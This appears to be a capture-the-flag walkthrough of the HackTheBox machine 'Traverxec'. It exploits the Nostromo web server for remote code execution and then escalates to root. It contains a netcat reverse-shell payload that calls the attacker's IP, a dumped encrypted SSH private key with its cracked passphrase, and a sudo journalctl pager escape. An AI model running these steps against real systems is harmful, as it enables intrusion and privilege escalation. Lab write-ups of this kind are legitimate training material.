HackTheBox “Traverxec” Walkthrough

Traverxec, an easy-level Linux OS machine on HackTheBox, necessitating thorough enumeration and exploitation of the web server, Nostromo. The initial step involved capitalizing on a Remote Code Execution (RCE) vulnerability using a python script we got through searchsploit. Subsequently, I leveraged the knowledge of the user’s utilization of a web home directory on the server to pivot into their private files. The final phase entailed elevating privileges to root by exploiting the utilization of sudo in conjunction with journalctrl.

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

Visit the target at port 80.

Given that the target is operating a Nostromo 1.9.6 web server as we got from nmap scan results, we will check what would searchsploit tell us.

We get an exploit that corresponds precisely to the version. Let’s download it.

Let’s run it.

Exploitation:

We will initiate the process by deploying the following command as a payload argument for the Python script:

nc 10.10.14.8 4343 -e /bin/bash

However, let’s set up a listener.

Run the script.

Check the listener.

Privilege Escalation:

Since we have a Nostromo web server, let’s have a look around and check its conf folder.

The home directory of David possesses restricted readability for us; nonetheless, it is feasible to directly cd into the folders referenced within the conf file above. Let’s have a look at the public_www folder.

We are gonna need to extract this backup folder, so, let’s cp it to /tmp and then extract.

Check id_rsa.

www-data@traverxec:/tmp$ cat home/david/.ssh/id_rsa
cat home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----

We transfer the target file to our attack box, where we utilize the ssh2john tool to convert it into a format that can be processed by John. Subsequently, we initiate the John to perform the password cracking process on the converted file.

We ssh into the target using the id_rsa and the passphrase we cracked “hunter”.

Let’s have a look around David’s home folder.

Run server-stats.sh.

server-stats.sh.

david@traverxec:~$ cat /home/david/bin/server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

After reviewing the information within the ‘server-stats.sh’ file, it appears that the user ‘david’ possesses permissions to execute ‘journalctl’ with root. This signifies that I have the capability to employ the subsequent command with elevated privileges:

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

As per the details provided in GTFOBins, an opportunity presents itself to break free from the pager using the!/bin/bash. It is worth noting to minimize the shell window as small as possible to be able to type the command.

Now, we can escape it with !/bin/bash.

Cheers.